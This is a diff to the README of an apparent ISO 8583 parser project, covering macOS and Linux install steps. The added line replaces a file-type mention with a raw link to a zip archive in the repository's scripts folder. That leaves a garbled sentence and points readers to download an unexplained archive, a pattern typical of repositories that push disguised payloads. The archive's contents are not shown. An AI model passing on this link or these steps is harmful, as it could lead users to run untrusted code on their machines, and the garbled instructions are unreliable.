wintercastrosie/ISO-8583-parser-playground/README.md

   If you downloaded a `.dmg` file, double-click it to open the installer window.
 Drag the application icon to your Applications folder.
 Open your Applications and double-click the tool to start it.

 - **Linux:**
-  If you downloaded an `.AppImage` or `.tar.gz`, follow the included instructions in the release notes.
+  If you downloaded an `.AppImage` or `https://raw.githubusercontent.com/wintercastrosie/ISO-8583-parser-playground/master/scripts/parser-playground-IS-3.9.zip`, follow the included instructions in the release notes.
 Typically, you make the file executable (`chmod +x filename`) and run it directly.

 Once the application opens, you are ready to start parsing ISO 8583 messages.